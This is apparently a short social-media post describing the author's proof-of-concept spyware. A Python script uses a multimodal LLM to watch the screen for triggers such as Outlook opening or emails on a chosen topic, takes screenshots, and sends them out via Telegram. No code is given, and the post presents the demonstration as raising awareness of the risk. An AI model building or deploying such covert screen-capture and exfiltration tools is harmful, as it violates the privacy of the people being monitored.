Ever tried turning an open-source LLM into a personal paparazzi? I did—purely as a proof-of-concept—and it’s both fascinating and a little alarming. I wrote a simple script that waits for Outlook to open, takes a screenshot, and instantly sends it off via Telegram. Yes. Classic programming could do the same thing, sure, but here’s the twist: with AI agents, you can fine-tune it to trigger specific words in an email or messages from a certain contact. Suddenly, we’re stepping into a new era of potential security hazards.

In my little test, we have a Python script in the back that screenshots the screen every few frames, and using a multimodal LLM, it analyzes a particular situation to meet and behave intelligently in those situations (for example, an open is opened or a user is sending an email about a specific topic to a specific person). This highlights just how accessible (and powerful) these open LLMs can be. It’s a demonstration of the creative possibilities: from harmless automations to worrisome “spyware” scenarios. As these AI tools become more sophisticated, we have to keep in mind that the line between “helpful agent” and “unwanted eavesdropper” can blur quickly.
Yes, if you already have a code running in a target PC, there is a lot you can do even without AI, but AI unlocks many possibilities with minimal effort that took a lot of complexity in coding if it wanted to be done in an old-fashioned manner.
With the rise of AI agents, sooner or later, people are going to have different forms of live assistants, such as tech helpers, creative idea counselors, and semi-automized agents accompanying them while browsing, and you name it. And there will be a new world of possibilities and situations that we haven’t faced before.
So why talk about it? Because knowledge is the best form of defense. If we understand how these technologies work—and how they might be misused—we’re better equipped to build safeguards. The future of AI is thrilling, but it’s also an invitation to stay vigilant about privacy, ethics, and security. Let’s explore the possibilities responsibly—so we can create innovation that helps us, not haunts us.